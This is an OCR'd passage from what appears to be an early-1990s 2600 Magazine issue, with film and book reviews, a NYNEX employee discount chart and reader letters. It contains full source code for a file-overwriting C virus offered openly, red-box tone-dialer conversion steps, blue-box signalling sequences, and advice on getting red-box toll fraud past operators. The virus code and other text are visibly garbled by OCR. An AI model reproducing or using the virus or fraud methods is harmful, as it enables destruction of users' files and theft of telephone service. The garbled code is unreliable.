  715.     Now, epoxy this gizmo to the side of the tone dialer. Use a lot of epoxy,
  716. as you must make the switch/crystals essentially embedded in epoxy resin, as
  717. in the diagram below:
  718.  
  719. Front view ->      _________________________
  720.                    |                       |T <-toggle switch
  721.                    |     oo    oo    oo    |---
  722.                    |                       |  |
  723.                    |                       |---
  724.                    |     1     2     3     |Bs <-two crystals (B=big,s=small)
  725.                    |                       |  |    in epoxy "blob"
  726.                    |     4     5     6     |--
  727.                    |                       |
  728.                    |     7     8     9     | ^two wires running to back of unit
  729.                    |                       |
  730.                    |     *     0     #     |
  731.                    |                       |
  732.                    -------------------------
  733.  
  734.  
  735.                    _________________________
  736.  Back view ->      |                       |
  737.                  T | o         ----- o-----------------------vent (1 of 4)
  738.                 ---|         /        \    |
  739.                |   |        |       --------------------speaker
  740.                  ---|       |         |    |
  741.                   sB|       |         |    |
  742.   2 wires ->       \------o   ----    o    |
  743.   running into     |                       |
  744.   vent             |                       |
  745.                    |                       |
  746.                    |                       |
  747.                    |                       |
  748.                    -------------------------
  749.  
  750.  
  751.     Make sure the epoxy is really gobbed on there. You want to be certain the
  752. switch and crystals are firmly attached and secure in a matrix of epoxy (it
  753. doesn't concduct electricity, so don't worry about shorting out the
  754. connections to the toggle switch). Just don't gum up the action of the switch!
  755.  
  756.     Basically, you've altered the device so you can select between two crystals
  757. to generate the timing for the microprocessor in the tone dialer.
  758.  
  759.     Turn on the tone dialer. Now you can easily switch between the two crystal
  760. types. The small crystal will generate ordinary DTMF tones. By simply flicking
  761. the switch, you generate higher tones, using the memory function of the tone
  762. dialer, save five stars in the P1 location. Now dial the P1 location using the
  763. big crystal. Sure sounds like the tones for a quarter, dowsn't it?
  764.  
  765.     Carrying this around with you will always come in handy with both telco
  766. payphones and COCOTs! No phreak should be without one!
  767.  
  768.     References for this article include Noah Clayton's excellent piece on
  769. COCOTs in 2600 Magazine, Autumn 1990. Also The Plague's articlt, on Tone
  770. Dialer conversion to Red Box, 2600 Magazine, Summer 1990 (which inspired me to
  771. create the COMBO-BOX (red box plus DTMF dialer).
  772.  
  773.     Information is power... share it And drink massive amounts of Jolt Cola.
  774. Trust me, it's good for you. Keep the faith, and never stop searching for new
  775. frontiers. 
  776.  
  777.  
  778.  
  779.       ------------------------------------------------------------------
  780.  
  781.  
  782.                                 FILM REVIEW
  783.                                   Sneakers
  784.                              Universal Pictures
  785.  
  786. Starring:  Robert Redford, Ben Kingsley, Dan Akroyd, River Phoenix, James
  787.            Earl Jones, Sidney Poitier, David Strathairn, Mary McDonnell.
  788.  
  789. Review by Emmanuel Goldstein
  790.  
  791.     If there's one thing we can determine right off the bat, its that Sneakers
  792. is most deflniiely a fun film. But whether or not it is a hacker film is a
  793. topic open to debate. A good many of the characlers are hackers, or former
  794. hackers. And it is this skill which gives them the ability to do what they do:
  795. get into things they're not supposed to be able to get into. The difference is
  796. that these people do it for profit. And that fact alone is enough to make this
  797. a non-hacker movie. Afar all, hackers don't do what they do with profit in
  798. mind. But Sneakers is most definitely a film for hackers since there is so
  799. much in the way of technique that is illustrated.
  800.  
  801.      The opening scene is a flashback to the ideologically correct era of anti-
  802. war marches and draft card burnings. It's at that time that two hackers
  803. (complete with rotary phones and an acoustic coupler) get into some major
  804. trouble when they mess with Richard Nixon's bank account. The stage is set,
  805. the time shifts to the present, and one of the hackers turns into Robert
  806. Redford. He now runs a company that tests security, for a phenomenal fee.
  807. (Some of our friends who actually do this kind of thing tell us that the fee
  808. is absurdly low for that type of work.) His co-workers include a blind phone
  809. phreak who has remarkable perceptive powers, a hopeless paranoid who's
  810. convinced that everything is a plot of some kind, an ex-CIA agent who doesn't
  811. like to talk about why he left, and a kid who changed his grades by computer,
  812. no doubt after reading our Autumn 1989 issue. This mixed up bunch, played by a
  813. well-above-average cast, is fodder for unique situations and dialogue. And
  814. it's about time.
  815.  
  816.      The action centers around the group's quest for a magic box which can
  817. supposedly decrypt any encryption scheme. "There isn't a government in the
  818. world that wouldn't kill" for this kind of technology, they aptly surmise. The
  819. existenco of this magic box is the one truly silly element of Sneakers.
  820. Fortunately, the remaining technical issues contain only trivial flaws, such
  821. as lack of a delay on a multi-satellite phone call or the fact that everybody
  822. seems to use compatible equipment. We must recognize that Hollywood needs to
  823. take some liberties with reality.
  824.  
  825.     As the group continues its quest for the Holy Box, they become caught up
  826. in the whole FBI-CIA-NSA world. leaving the viewer with a less than
  827. satisfactory judgment of how the world of intelligence works. This was without
  828. doubt precisely the intention.
  829.  
  830.     In many ways, Sneakers is a political thriller and one which doesn't miss
  831. an opportunity to throw some political barbs. George Bush and the Republican
  832. Party are the favorite targets of this "culturally elitist" production. Again,
  833. it's about time. 
  834.  
  835.     But best of all is the fact that Sneakers at no point tries to send a moral
  836. message about hacking. Rather, hackers are looked upon as a reality; there are
  837. people who do this kind of thing and they have a useful place in society. With
  838. the kind of information being recorded these days, you need some of that
  839. hacking ability to be able to figure out what's really happening. True. this
  840. knowledge can be misused and distorted, as the film demonstrates. But that is
  841. human nature. If the good hackers were to disappear, only the evil ones would
  842. remain.
  843.  
  844.     Sneakers manages to send a serious message without taking itself too
  845. seriously. In fact, the confrontation between the NSA bigwig (James Earl
  846. Jones) and the group carrying the magic box is remarkably reminiscent of
  847. Dorothy and friends meeting the wizard after getting the Wicked Witch of the
  848. West's broomstick. A great man probably once said that the best way to send a
  849. serious message is through humor. Sneakers does this and still keeps the
  850. audience on the edge of their seats. 
  851.  
  852.  
  853.  
  854.       ------------------------------------------------------------------
  855.  
  856.  
  857.     People are always wondering whether or not telephone company employees get
  858. discounts on their phone bills. Well, we've discovered that NYNEX offers two
  859. classes of what is known as Telephone Service Allowance (TSA). This allowance
  860. can be used by NYNEX employees and their families for personal use as well as
  861. NYNEX business. Forbidden activities include other businesses or political
  862. campaign activities. The allowance only applies to the primary residence of
  863. the employee. Class A service provides a 100 percent allowance while Class B
  864. provides a 50 percent allowance. Those entitled to Class A status include
  865. management employees, nonmanagement employees with 30 years or more, retired
  866. employees on a service or disability pension, and employees with specified job
  867. functions, particularly those on call 24 hours a day. Those entitled to Class
  868. B generally include employees not eligible for Class A.
  869.  
  870.                                 CHART II
  871.                    TELEPHONE SERVICE ITEMS AND ALLOWANCE
  872. ------------------------------------------------------------------------------
  873.                                              New England        New York
  874.                                              Cls A    Cls B   Cls A   Cls B
  875. SERVICE ITEMS
  876. ------------------------------------------------------------------------------
  877.  
  878. Exchange Servlce
  879. Basic service, one main line, 3 outlet        100%     50%      100%      50%
  880. wires, wire investment, etc.)  Includes any
  881. IntraLATA toll option offered.
  882. ------------------------------------------------------------------------------
  883. Other Services
  884. Local Exchange Service Mileage                100%.    100%.    100%.     50%
  885. Touch Tone Service                            100%     100%     100%.     50%
  886. Customer Access Charge                        100%,    100%.    100%.     50%
  887. End User Originating Access (when approved)   100%.    100%.     --        --
  888. ------------------------------------------------------------------------------
  889. Custom Calling Features or Package
  890. Ca11 Malting                                  100%,    50%      100%       --
  891. Call Forwarding                               100%.    50%      100%       --
  892. Three-way Calling                             100%.    50%      100%       --
  893. Speed Calling-8 numbers                       100%.    50%      100%       --
  894. Speed Calling-30 numbers                      100%,    50%      100%       --
  895. ------------------------------------------------------------------------------
  896.                                  Charges
  897. (i.e. Install  line, change Service, install  100%     50%      100%      50%
  898. wire & Jacks, change grade of service or
  899. telephone number.)  Does not include station
  900. or other equipment.
  901. ------------------------------------------------------------------------------
  902. Toll Charges
  903. IntraLATA toll and credtt card calls (3),     100% up  50% of   100% up  50%
  904. additional local usage, IntraLATA directory   to $90/  up to    to $35/  (2)
  905. assistance, & temporary surcharges            qtr.     $60/mo.  mo.
  906. ------------------------------------------------------------------------------
  907. Directory Listings
  908. Change in listing                             100%     100%     100%     100%.
  909. Additional directory listings:
  910. Unrelated person-same house                    --       --       --       --
  911. 2 or more employees-same house                100%     100%.    100%     100%
  912. Relatives/dependents of employees-same house   50%      50%      --       --
  913. ------------------------------------------------------------------------------
  914. Notes:
  915. 1.   An empIoyee eligable for a CIass A Service allowance may have additional
  916. quantitiea of the items as well as Continuous Property Mileage (employee's
  917. property) at a 50% allowance with approval of his/her fifth level.
  918. 2.  Applies to local message units, IntraLATA directory assistance, and
  919. temporary surcharges only.
  920. 3.   IntraLATA charges are billed by the telephone company providing your
  921. service. InterLATA charges are billed by long distance companies (i.e.
  922. AT&T, MCI, GTE Sprint).
  923.  
  924.  
  925.  
  926.       ------------------------------------------------------------------
  927.  
  928.                           A Simple Virus in C
  929.                              by Infiltrator
  930.  
  931.     C seems to be the programming language of the 90's. Its versatility
  932. and ability for the same code to be used on different computer platforms
  933. are the reasons for this. So in a brief burst of programming energy I
  934. have created this little C virus. It's a basic overwriting virus that attacks
  935. all .exe files in the directories off the main C directory. The virus spreads
  936. itself by overwriting the virus code on top of the victim file. So the victim
  937. file becomes yet another copy of the virus. So as not to reinfect, the
  938. virus places a virus marker at the end of the victim file. Now I know that
  939. this is not the best coding and that it could be improved and refined but
  940. since I'm too lazy to do that you will just have to suffer.
  941.     Now the legal stuff: Please do not use this virus to do any harm or
  942. destruction, etc., etc. This virus is for educational use only and all that
  943. good stuff. Have fun!
  944.  
  945. /***************************************************************************
  946. *                                                                          *
  947. *   A note from your friendly OCR'r:  I HATE C.  If this were pascal, or   *
  948. *  even ASM, I could guarantee the accuracy of the following code, but     *
  949. *  since more than 5 minutes of anyone elses C source gives me migraines,  *
  950. *  I'd use the following code VERY carefully.  Better yet, use the HIGHLY  *
  951. *  accurate 2600 subscription dept. address in this file, and you can      *
  952. *  proceed with your mayhem in relative safety...                          *
  953. ***************************************************************************/
  954.  
  955.  
  956.                 /* THE SIMPLE OVERWRITING VIRUS */
  957.                 /*   CREATED BY INFILTRATOR        */
  958. #include "stdio.h"
  959. #include "dir.h"
  960. #include "io.h"
  961. #include "dos.h"
  962. #include "fcntl.h"
  963. /********** VARIABLES FOR THE VIRUS **********/
  964. struct ffblk ffblk, ffblk1 ,ffblk2;
  965. struct ftime ft;
  966. int done,done1 ,lfof,marker=248,count=0,vsize=19520,drive;
  967. FILE *victim,*virus,*lf;
  968. char ch,vc,buffer[MAXPATH],vstamp[23]="HAPPY, HAPPY! JOY,JOY! ";
  969. struct ftime getdt();/*               */
  970. setdt();             /* Function prototypes
  971. dna(int argc, char *argv[]);/*               ---- */
  972. /********** MAIN FUNCTION (LOOP) **********/
  973. void main(int argc, char *argv[])     /* Start of main loop */
  974. {
  975.     dna(argc,argv);           /* Call virus reproduction func */
  976.     getcwd(buffer, MAXPATH);/* Get current directory */
  977.     drive -- getdisk();       /* Get current drive number */
  978.     setdisk(2);                         /* Goto 'C' drive */
  979.                             /* Change to root directory */
  980.     donel= findfirst(" *",&ffblkl,FA_DIREC);/* Get 1 st directory */
  981.     while(!done1) {            /* Start of loop */
  982.     chdirfffblk1 .ff_name);    /* Change to directory */
  983.     if (If = findfirst("*.exe",&ffblk2,0) == -1 ) {/*No file to infect */
  984.                                 /* Back to root */
  985.         donel=findnext(&ffblkl);   /* Get next dir */
  986.  
  987.     }
  988.     else (                  /* Yes, infectable file found */
  989.             dna(argc,argv);     /* Call reproduction func. */
  990.                                    /* Back to root */
  991.             donel=findnext(&ffblkl);/* Next directory */
  992.     }
  993.     }                              /* End loop */
  994.     setdisk(drive);         /* Goto original drive */
  995.     chdir(buffer);          /* Goto original dir */
  996.     }                              /* End of virus */
  997. /********** END OF MAIN FUNCTION, START OF OTHER FUNCTIONS **********/
  998. dna(int argc, char *argv[])   /* Virus Tasks Func */
  999. {
  1000.       Ifof = findfirst("*.exe",&ffblk, 0);/* Find first '.exe' file */
  1001.       while(!done)
  1002.       {
  1003.     victim=fopen(ffblk,ff_name,"rb+");  /* Open file */
  1004.     fseek(victim,-1,SEEK_END);/* Go to end, look for marker */
  1005.       ch=getc(victim);       /* Get char */
  1006.                              /* Is it the marker? YES */
  1007.       {
  1008.     fclose(victim);          /* Don't Reinfect */
  1009.         done=findnext(&ffblk);/* Go to next '.exe' file */
  1010.     }
  1011.     else                            /* NO...Infect! */
  1012.         {
  1013.         getdt();                   /* Get file date */
  1014.         virus=fopen(argvi()],"rb");/* Open host program */
  1015.         victim=fopen(ffblk,ff_name,"wb" );/* Open file to infect */
  1016.         while ( count ( vsize )/* Copy virus code */
  1017.         {                        /* to the victim file */
  1018.                vc=getc(virus);/* This will ovenNrite */
  1019.                putc(vc,victim);/* the file totally */
  1020.                count++;    /* End reproduction */
  1021.         }
  1022.         fprintf(victim,"%s",vstamp);/* Put on virus stamp, optional */
  1023.         fclose(virus);     /* Close Virus */
  1024.         fclose(victim);    /* Close Victim */
  1025.         victim=fopen(ffblk, ff_name,"ab");   /* Append to victim */
  1026.         putc(marker,victim);         /* virus marker char */
  1027.         fclose(victim);        /* Close file */
  1028.         setdt();                /* Set file date to original */,
  1029.         count=0;               /* Reset file char counter */
  1030.         done=findnext(&ffblk); /* Next file */
  1031.         }
  1032.     }
  1033. }
  1034. struct ftime getdt()           /* Get original file date func */
  1035. {
  1036.       victim=fopen(ffblk,ff_name,"rb");/* Open file */
  1037.       getftime(fileno(victim), &ft);  /* Get date */
  1038.       fclose(victim);                 /* Close file */
  1039.       return ft;                      /* Return */
  1040.  
  1041. }
  1042. setdt()                                  /* Set date to original func *l
  1043. {
  1044.         victim=fopen(ffblk,ff_name,"rb");                 I* Open file *l
  1045.         setftime(fileno(victim), &ft);                    /* Set date */
  1046.         fclose(victim);                                   /* Close file */
  1047.         return ();                                         /* Return */
  1048. }
  1049.  
  1050.  
  1051.       ------------------------------------------------------------------
  1052.  
  1053.  
  1054.                                 BOOK REVIEW
  1055.  
  1056. Hacker Crackdown: Law and Disorder on the Electronic Frontier
  1057. by Bruce Sterling
  1058. $23.00, Bantam Books, 313 pages
  1059. Review by The Devil's Advocate
  1060.  
  1061.     The denizens of cyberspace have long revered Bruce Sterling as one of
  1062. cyberfiction's earliest pioneers. Now, Sterling has removed his steel-edged
  1063. mirrorshades to cast a deep probing look into the heart of our modern-day
  1064. electronic frontier. The result is The Hacker Crackdown, the latest account of
  1065. the hacker culture and Sterling's first foray into non-fiction.
  1066.  
  1067.     At first glance, Crackdown would appear to follow in the narrative
  1068. footsteps of The Cuckoo's Egg and Cyberpunk. The setting is cyberspace, 1990:
  1069. year of the AT&T crash and the aftermath of Ma Bell's fragmentation; year of
  1070. Operation Sundevil, the Atlanta raids, and the Legion of Doom breakup; year of
  1071. the E911 document and the trial of Knight Lightning; year of the hacker
  1072. crackdown, and the formation of that bastion of computer civil liberties, the
  1073. Electronic Frontier Foundation. Unlike Cuckoo and Cyberpunk, however, Sterling's
  1074. work does not center around characters and events so much as the parallels
  1075. he draws between them. Crackdown is far less story and far more analysis.
  1076. Crackdown is also personal. Missing is the detached and unbiased aloofness
  1077. expected of a journalist. Intermingled with the factual accounts, for
  1078. instance, are Sterling's keen wit and insight:
  1079.  
  1080.     "In my opinion, any teenager enthralled by computers, fascinated by the
  1081. ins and outs of computer security, and attracted by the lure of specialized
  1082. forms of knowledge and power, would do well to forget all about hacking and
  1083. set his (or her) sights on becoming a Fed. Feds can trump hackers at almost
  1084. every single thing hackers do, including gathering intelligence, undercover
  1085. disguise, trashing, phone-tapping, building dossiers, networking, and
  1086. infiltrating computer systems...."
  1087.  
  1088.     Sterling is fair. He effectively gets into the psyche of hacker and
  1089. enforcer alike, oftentimes poking fun at the absurdity in both lines of
  1090. reasoning. To hackers he is honest and brutal: "Phone phreaks pick on the
  1091. weak." Before the advent of ANI, hackers exploited AT&T. Then they drifted to
  1092. the Baby Bells where security was less than stellar. From there it was a
  1093. gradual regression all the way down to local PBX's, the weakest kids on the
  1094. block,  and  certainly  not  the megacorporate entities that give rise to
  1095. "steal from the rich" Robin Hood excuses. To enforcers he is equally brutal,
  1096. charting a chronicle of civil liberty abuses by the FBI, Secret Service, and
  1097. local law enforcement agencies.
  1098.  
  1099.     Perhaps the best reason to read Crackdown is to learn what other books
  1100. have neglected to focus on: the abuses of power by law enforcement. Indeed, it
  1101. is these abuses that are the main focus of Sterling's work. One by one he
  1102. gives a grim account of the raids of 1990, the Crackdown or cultural genocide
  1103. that was to have as its goal the complete and absolute extinction of hacking
  1104. in all of its manifestations.
  1105.  
  1106.     On February 21, 1990, Robert Izenberg was raided by the Secret Service.
  1107. They shut down his UUCP site, seized twenty thousand dollars' worth of
  1108. professional equipment as "evidence," including some 140 megabytes of files,
  1109. mail, and data belonging to himself and his users. Izenberg was neither
  1110. arrested nor charged with any crime. Two years later he would still be trying
  1111. to get his equipment back.
  1112.  
  1113.     On March 1, 1990, twenty-one-year- old Erlk Bloodaxe was awakened by a
  1114. revolver pointed at his head. Secret Service agents seized everything even
  1115. remotely electronic, including his telephone. Bloodaxe was neither arrested
  1116. nor charged with any crime. Two years later he would still be wondering where
  1117. all his equipment went.
  1118.  
  1119.     Mentor was yet another victim of the Crackdown. Secret Service agents
  1120. "rousted him and his wife from bed in their underwear," and proceeded to seize
  1121. thousands of dollars' worth of work- related computer equipment, including his
  1122. wife's incomplete academic thesis stored on a hard disk. Two years later and
  1123. Mentor would still be waiting for the return of his equipment.
  1124.  
  1125.     Then came the infamous Steve Jackson Games raid. Again, no one was
  1126. arrested and no charges were filed. "Everything appropriated was officially
  1127. kept as 'evidence' of crimes never specified."
  1128.  
  1129.     Bruce Sterling explains (in an unusual first-person shift in the
  1130. narrative) that it was this raid above all else which compelled him to "put
  1131. science fiction aside until l had discovered what had happened and where this
  1132. trouble had come from."
  1133.  
  1134.     Crackdown culminates with what is perhaps the most stunning example of
  1135. injustice outside of the Steve Jackson raid. Although the trial of Knight
  1136. Lightning is over, its bittersweet memories still linger in the collective
  1137. mind of cyberspace. This, after all, was the trial in which William Cook
  1138. maliciously tried (and failed) to convict a fledgling teenage journalist for
  1139. printing a worthless garble of bureaucratic dreck by claiming that it was in
  1140. fact a $79,449 piece of "proprietary" code. In an effort to demonstrate the
  1141. sheer boredom and tediousness of the E911 document, and the absurdity of
  1142. Cook's prosecution, Crackdown includes a hefty sampling of this document (at a
  1143. savings of over $79,449 by Cook's standardsl).
  1144.  
  1145.     More than any other book to date, Crackdown concentrates on the political
  1146. grit and grime of computer law enforcement, answering such perennial favorites
  1147. as why does the Secret Service have anything to do with hackers anyway? In
  1148. Crackdown we learn that something of a contest exists between the Secret
  1149. Service and the FBI when it comes to busting hackers. Also touched upon are
  1150. the "waffling" First Amendment issues that have sprung forth from cyberspace.
  1151.  
  1152.     Crackdown is a year in the life of the electronic frontier. For some, a
  1153. forgotten mote of antiquity; for others, a spectral preamble of darker things
  1154. to come. But for those who thrive at the cutting edge of cyberspace,
  1155. Crackdown is certain to bridge those distant points of light with its account
  1156. of a year that will not be forgotten.
  1157.  
  1158.  
  1159.  
  1160.       ------------------------------------------------------------------
  1161.  
  1162.  
  1163.                                   I/O
  1164.  
  1165. Blue Box Questions
  1166. Dear 2600:
  1167.     A while ago I ordered a book called Spy Game. I was reading about the
  1168. phone company and came across a column about you. I would like to access
  1169. different operators for different info needs and I was wondering how exactly to
  1170. access them. I want to know how to achieve a Key Pulse tone, a STart tone,
  1171. number 11, 12, and KP2. I also want to know if I went to Radio Shack and
  1172. bought their 15 dollar phone dialer, if I would be able to get a repair shop
  1173. to modify it so it can achieve these tones?
  1174.                 MD
  1175.                 Sheboygan, WI
  1176.  
  1177.     Experimentation is really the only way to discover such things since
  1178.     there's so much variation between regions. The blue box frequencies have
  1179.     been published several times in 2600, most recently in the Summer 1992
  1180.     issue. You're much better off with a genuine blue box or demon dialer
  1181.     rather than trying to modify a phone dialer for that purpose.
  1182.  
  1183.  
  1184. Dear 2600:
  1185.     Quite a few publications on the subject of blue boxing reached the Dutch
  1186. press last year. The Dutch hacker magazine Hack-Tic printed out a complete
  1187. set of instructions for using the CCITF-4 and -5 systems on international
  1188. telephone lines. Most newspapers covered the issue as well and even one radio
  1189. program is said to have broadcast a complete CCITT-5 sequence, which gave an
  1190. international telephone connection to the secretary of Mr. Bush for free.
  1191.  
  1192.     After several attempts (and a sky-high telephone bill), I somehow managed
  1193. to program my Mac to do the same job (i.e. generating DTMF and C-5 tones).
  1194. Because Dutch telephone authorities limited C-5 (C-4 has gone already) on free
  1195. international lines, using this system has become a real task.
  1196.  
  1197.     But the point I want to make here is that most people only try to reach a
  1198. so-called transit international telephone exchange. At this point in their
  1199. connection, they disconnect by using the Clear Forward signal. With Seize and
  1200. KP2 they will be able to dial almost any country in the world. But what
  1201. happens if they get stuck in a non-transit exchange? KP2 will not be accepted,
  1202. so only local (i.e. in that specific country) calls can be set up. 
  1203.  
  1204.     I discovered that you can sometimes get back to the outgoing international
  1205. network by using KP1 which is indeed the local differentiator. The idea is to
  1206. let the national network of your (temporary) destination make the outgoing
  1207. connection. For instance, by using Seize-KP1 -00151247409 36-END on the lines
  1208. from the Netherlands to Iceland (landcode 354), connection will be made to the
  1209. still non-suped musac line published in 2600 in May 1985. The first
  1210. intemational lines (i.e. to the USA). Almost the same goes for the Solomon
  1211. Isles (landcode 677), only an extra zero is needed here (notice the relaying
  1212. in Solomon's telephone network, which sounds really beautiful). 
  1213.  
  1214.     Note that in most countries this scheme does not seem to work. Just see it
  1215. as an extension of your phreaking tools.
  1216.                 Phrankenstel.
  1217.  
  1218.     The trick used from the Netherlands involved dialing Iceland Direct
  1219.     (060220354), sending a Clear Forward, Seize, and a KPI (to indicate a
  1220.     terminal call or domestic call), 0 (to incHcate a normal call), then 0
  1221.     followed by the country code and number. That trick no longer works.
  1222.  
  1223.  
  1224. Assorted Comments
  1225. Dear 2600:
  1226.     I attended the Winter '92 Consumer Electronic Show in Las Vegas from
  1227. January 9-12 and saw few interesting new products. Although there were about
  1228. 15,000 exhibits, there were maybe 1,000 computer related exhibits, and the
  1229. majority of those were power supply protection devices. I did see some
  1230. interesting computer security products. Some companies were pushing their
  1231. Caller ID devices and software. One software Caller ID system which was run on
  1232. an IBM compatible would pull up all the caller's pertinent information (name,
  1233. address, etc.) and digitized photo (if available) from a database for display
  1234. on the scneen (VIVE Synergies Inc., 30 West Beaver Creek Road, Unit 2,
  1235. Richmond Hill, Ontario L4B 3K1, Canada, phone (416) 882-6107). I also saw a
  1236. couple of regular Caller ID boxes and an integrated Caller ID phone with
  1237. speakerphone and memory dial and a 15 call digit incoming number memory
  1238. (SysPerfect Electronics of San Francisco, phone (415) 875-3550).
  1239.  
  1240.     One product I saw was designed to solve the problem concerning lack of
  1241. privacy on cellular phone calls for any phone call where security was a
  1242. concern. The Privacom P-25-C is a portable device which scrambles the audio
  1243. signal from your cellular or regular phone line to be descrambled by the same
  1244. device on the called end. The device offers 25 different scrambling codes
  1245. (which I see as pretty inadequate). To operate, the user dials his phone
  1246. normally. When the call is made and verification with the called party is
  1247. confirmed, a code is chosen and both parties place their receivers onto the
  1248. coupler of the device and pick up its handset. Conversation then continues
  1249. normally, all audio being scrambled before being sent over the line (or
  1250. through the air in the case of cellular phones). The device itself takes about
  1251. as much room as a portable cellular phone and runs continuously up to 20 hours
  1252. on battery power. (Swift Strike, Inc., PO Box 206, Galion, OH 44833, phone
  1253. (419) 468-1560. Additional sales and technical information: Addtel
  1254. Communications, (615) 622-8981 or 800-553-6870) 
  1255.  
  1256.     I went and visited the clowns at the Prodigy booth. I wouldn't have even
  1257. bothered but I felt this uncontrollable urge to confront them with the
  1258. allegations made against them concerning the Prodigy software scanning a user's
  1259. hard drive in search of address information for mailing purposes. Armed with
  1260. the inside knowledge out of the Autumn 1991 issue of 2600 that described how
  1261. Prodigy junk mail was received at a company addressed to non-existent
  1262. "people", I began to explain to them how the theory of their little invasion of
  1263. privacy seam was validated beyond reasonable doubt. They got pissed! "We never
  1264. did that," said one spokeswoman. "Do you believe everything you read?" asked
  1265. another, quite agitated spokesman. I walked off, leaving them there in their
  1266. angry and flustered state of loathing. Looking back I noticed them leering at
  1267. me. Every time after that when I walked by them they were still leering at me.
  1268. One must wonder, if they are so innocent of this accusation, why they became
  1269. so defensive rather than explain it away with amiable business tact. At any
  1270. rate, I had a good laugh making them squirm.
  1271.  
  1272.     In the Summer 1991 issue, TN wrote in telling of a way to place local calls
  1273. using the Radio Shack Tone Dialer Red Box, saying "I have found [it] to work
  1274. and have tested/it] all over Califomia." Apparently you did not travel very
  1275. far in your testing because it does not work in my area of Northern Califomia
  1276. (916 area code). While on the subject of the Red Box, recently a friend was
  1277. using it to call Hong Kong and encountered some interesting AT&T operator
  1278. shenanigans. Basically, by now it would be more than safe to conclude that
  1279. every phone company in the United States is aware of the Radio Shack Tone
  1280. Dialer conversion. AT&T must have some memo circulating stating proper
  1281. procedure for detecting and halting Red Box toll fraud. On one occasion, the
  1282. operator told my friend he was experiencing computer problems. He asked him to
  1283. insert 85 cents (my friend signalled four quarters with his Red Box) and then
  1284. claimed that it was not being received by his computer so he was going to
  1285. return it. My friend played along and told the operator he had received the
  1286. money back, although by that time he had realized he had not heard the
  1287. operator release signal nor the tell-tale click inside the phone of the hopper
  1288. relay. The operator asked him to insert the money again, which my friend did,
  1289. and then claimed, once again, to have retumed it, and asked my friend if he
  1290. got the money. This time, my friend said no, so the operator attempted again,
  1291. this time for real. My friend heard the operator release signal and a click
  1292. inside the payphone, and claimed he had gotten his coins back. "I'm going to
  1293. be polite about this," said the AT&T operator. "You have this little black box
  1294. with you that makes these sounds...." he continued. My friend didn't bother to
  1295. hear him out and simply hung up, which he regrets because who knows what he
  1296. may have learned. My friend said of the eight or so operators he dealt with
  1297. that night, three of them caught on to the Red Box. We must now ask ourselves
  1298. why. The answer doesn't require hours of study and research, as is painfully
  1299. obvious: the thing is too damn loud and too damn consistent. Also, it doesn't
  1300. help that the timing of the Red Box tones is off by a couple of milliseconds.
  1301. My suggestion? Place a bank card or credit card over the mouthpiece of the
  1302. phone to mute the volume of the tones to where they aren't so blatantly phony.
  1303. After all, the actual quarter tones as generated by the AT&T long distance
  1304. computers are barely audible themselves. Also, it wouldn't hurt to program
  1305. only one quarter in your priority memory and pound them out at inconsistent
  1306. intervals. Mind you, these suggestions are only necessary when dealing with
  1307. live operators as the long distance computers are far friendlier, which is
  1308. kind of scary when you think about it. Computers friendlier than live people.
  1309. If they didn't rely so heavily on their damned computers, they'd have the
  1310. current Red Box fad beat. But no, as it is, computers are infinitely more wise
  1311. than humans, so it continues. Yes, we live in a sad world. Oh well.
  1312.                 DC
  1313.  
  1314.  
  1315. Sheer Frustration
  1316. Dear 2600:
  1317.     I have entitled the following Modern Times - A Drama in Too Many Acts.
  1318.  
  1319.     1st Act: Reading the 2600 Magazine of Autumn 1991 I found on page 26 a
  1320. letter from GS, Seattle: "Bellcore has a new publications listing. The Catalog
  1321. of Technical Information." With one eye on the mag and one on the phone I
  1322. dialed the 800 number given. But the only thing I heard was a German tape
  1323. telling me to check the number or call the operator. Oh no! These are the
  1324. Nineties, the Digital Decade!
  1325.  
  1326.     2nd Act: I finally called the operator and explained my problem. "What? I
  1327. can't believe that. You can dial every number directly!" was the answer.
  1328. Insisting on my not being deaf and dumb, I gave the number to her. "Okay, I'll
  1329. try it for you. But that will cost extra! Stay at your phone, I'll call you
  1330. back." 
  1331.  
  1332.     3rd Act: Some minutes later my phone rang. Operator: "I can't get
  1333. through... sorry. You may call the Intemational Telephone Number Information
  1334. for a local number." What a concept, not knowing the address or even the city!
  1335.  
  1336.     4th Act: A quick look at my private "Toll-free Telephone Number Database"
  1337. revealed an AT&T USA Direct connection to an operator in the States. Not very
  1338. hopefully I dialed the number and bingo! He wouldn't do a damned thing for me
  1339. without having an AT&T Calling Card! 
  1340.  
  1341.     5th Act: Eventually I found the toll-free number from Germany to AT&T in
  1342. Kansas City. The nice lady told me that there are no AT&T offices in Germany
  1343. (why are they placing their ads here all the time?) and that I need a Visa Card
  1344. to get a Calling Card. 
  1345.  
  1346.     6th Act: Still not ready for surrender, I tried to get a local number.
  1347. For the needed address I wanted to call "Telename of Springfield, VA (same
  1348. issue, page 31). You surely can imagine what happened: "Your call cannot be
  1349. completed as dialed...." The Telename numbcr is a 900 number!
  1350.  
  1351.     7th Act: I sent a fax (this one) to 2600 Magazine, asking for help. So
  1352. please print a local telephone number for Bellcore in your next issue, or at
  1353. least an address. Thank you. 
  1354.                 Germany
  1355.  
  1356.     The number in question, 800-521-2673, translates to 908-699-5800 or 908-699-
  1357.     5802. We'll try to print translations in the future.
  1358.  
  1359. Mild Encryption
  1360. Dear 2600:.
  1361.     I just purchased one of the Motorola cordless (not cellular) phones which
  1362. is manketed as having "secure clear" - a method of mild grade voice
  1363. ecncryption of the radio portion.
  1364.  
  1365.     Some friends and I listened in with our receivers and the audio is indeed
  1366. extremely difficult for casual monitoring. It would, however, be trivial for
  1367. any serious agency or corporate type to break through, but then again those
  1368. are the people who'd be doing other things as well. 
  1369.  
  1370.     In short, it does provide moderate levels of security. In effect, you're
  1371. getting "wire grade" pmtection over a condless link.
  1372.  
  1373.     The price is quite a bit high - about $200-$250, depending on store,
  1374. features, etc.
  1375.                 Danny
  1376.                 New York
  1377.  
  1378. Cable Hacking
  1379. Dear 2600:
  1380.     I've hacked my way through the phone system, computers attached to modems,
  1381. locks, etc. Now I'm interested in the cable company. Manhattan Cable in
  1382. particular. How do those addressable converter boxes work, anyhow? How does the
  1383. central office turn on pay-per-view for my box? Has anyone hacked this system
  1384. and, if so, can you please publish some info so I don't have to redo all the
  1385. work?  My interest is purely in hacking to understand and learn, not to steal
  1386. service!
  1387.                 Lawrence
  1388.                 NYC
  1389.  
  1390. Dear 2600:
  1391.     I am a subscriber and really enjoy your magazine. I especially love your
  1392. do-it-yourself Radio Shack projects. I have a request for one of your upcoming
  1393. issues. I was wondering if you could put in some instructions and schematics
  1394. on how to cheaply build a Cable TV pay channel "descrsmbler". 
  1395.                 Anonymous
  1396.  
